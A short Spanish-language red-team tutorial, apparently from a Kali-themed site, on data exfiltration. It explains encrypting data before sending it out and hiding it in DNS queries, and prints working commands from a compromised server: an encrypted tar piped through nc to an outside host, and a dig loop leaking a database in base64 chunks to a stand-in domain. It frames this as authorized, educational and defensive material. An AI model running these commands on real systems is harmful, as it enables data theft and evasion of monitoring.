KALI
Exfiltración de datos
En un ejercicio de red team, demostrar que puedes SACAR los datos es parte del impacto.
Si la salida directa está abierta, comprimes y envías por HTTP o SCP. Si está filtrada, escondes los datos en canales permitidos: dentro de consultas DNS, o en peticiones que parecen tráfico normal.
También cifras antes de sacar, para que no se detecte el contenido. Simular la exfiltración le enseña al equipo defensor qué monitorear.
Todo dentro del alcance autorizado del ejercicio.
# los comandos
www-data@victim:$ tar czf - /var/www/datos | openssl enc -aes-256-cbc -k clave | nc 10.0.0.50 443copiarwww-data@victim:$ # exfil por DNS: dividir en trozos base32 -> consultas a tu dominiocopiarwww-data@victim:$ for c in $(base64 -w40 secreto.db); do dig $c.exf.tudominio.co @tu-dns; donecopiarSolo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.